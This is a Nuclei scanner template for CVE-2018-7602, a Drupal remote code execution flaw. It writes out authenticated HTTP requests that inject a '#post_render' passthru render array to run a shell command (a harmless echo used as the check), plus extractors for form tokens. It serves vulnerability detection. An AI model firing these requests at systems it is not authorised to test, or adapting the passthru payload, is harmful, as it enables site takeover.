nuclei-templates/cves/2018/CVE-2018-7602.yaml

80 lines
2.7 KiB
YAML
Raw Normal View History

2022-02-04 19:09:58 +00:00
id: CVE-2018-7602
2022-02-04 19:09:58 +00:00
info:
name: Drupal - Remote Code Execution
2022-02-04 19:09:58 +00:00
author: princechaddha
severity: critical
description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
2022-02-04 19:09:58 +00:00
reference:
- https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
- https://nvd.nist.gov/vuln/detail/CVE-2018-7602
- https://www.drupal.org/sa-core-2018-004
- https://www.exploit-db.com/exploits/44557/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7602
tags: cve,cve2018,drupal,authenticated,cisa
2022-02-04 19:09:58 +00:00
requests:
- raw:
- |
POST /?q=user%2Flogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_id=user_login&name={{username}}&pass={{password}}&op=Log+in
- |
GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1
Host: {{Hostname}}
- |
POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account
- |
POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
form_build_id={{form_build_id}}
cookie-reuse: true
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- 'CVE-2018-7602-POC'
extractors:
- type: regex
part: body
name: userid
internal: true
group: 1
regex:
- '<meta about="([/a-z0-9]+)" property="foaf'
- type: regex
part: body
name: form_token
internal: true
group: 1
regex:
- '<input type="hidden" name="form_token" value="(.*)" />'
- type: regex
part: body
name: form_build_id
internal: true
group: 1
regex:
- '<input type="hidden" name="form_build_id" value="(.*)" />'
# Enhanced by mp on 2022/05/13